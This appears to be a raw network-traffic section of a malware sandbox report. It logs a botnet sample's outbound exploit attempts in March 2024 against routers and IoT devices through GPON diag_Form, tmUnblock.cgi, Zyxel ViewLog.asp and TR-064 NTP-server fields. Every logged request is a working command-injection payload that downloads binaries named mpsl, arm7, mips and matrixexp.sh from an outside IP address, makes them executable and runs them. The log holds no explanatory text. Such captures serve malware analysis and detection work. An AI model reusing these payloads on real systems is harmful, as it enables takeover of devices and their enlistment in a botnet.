                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        365192.168.2.1349300212.176.123.48443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503846884 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        366192.168.2.13523305.109.71.204443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503873110 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        367192.168.2.13394825.237.182.95443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503895044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        368192.168.2.1337386118.231.204.24443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503926992 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        369192.168.2.1353198118.150.1.20443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503943920 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        370192.168.2.1355338118.246.6.5443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503967047 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        371192.168.2.1352662109.25.191.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503971100 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        372192.168.2.134455242.245.234.126443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.503999949 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        373192.168.2.1360072172.67.189.1238080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.603863955 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:15.116363049 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        374192.168.2.134044082.165.114.14680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.816843033 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:14.994918108 CET323INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 21 Mar 2024 04:22:14 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Content-Encoding: gzip
                                                        Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
                                                        Mar 21, 2024 05:22:14.994956970 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 21 Mar 2024 04:22:14 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        375192.168.2.1353740213.192.252.7480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.822118998 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:15.011642933 CET793INHTTP/1.1 403 Forbidden
                                                        Date: Thu, 21 Mar 2024 04:22:14 GMT
                                                        Server: Apache
                                                        Content-Length: 199
                                                        Keep-Alive: timeout=3, max=1000
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 31 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:14 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        376192.168.2.1351016178.239.114.24880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.837692022 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:15.917856932 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:16.130908966 CET321INHTTP/1.1 405 Not Allowed
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 21 Mar 2024 04:22:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        377192.168.2.1350470221.163.122.797547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:14.945720911 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:16.396253109 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        378192.168.2.134241699.245.214.2027547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:15.046124935 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        379192.168.2.134812414.85.156.287547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:15.100630045 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
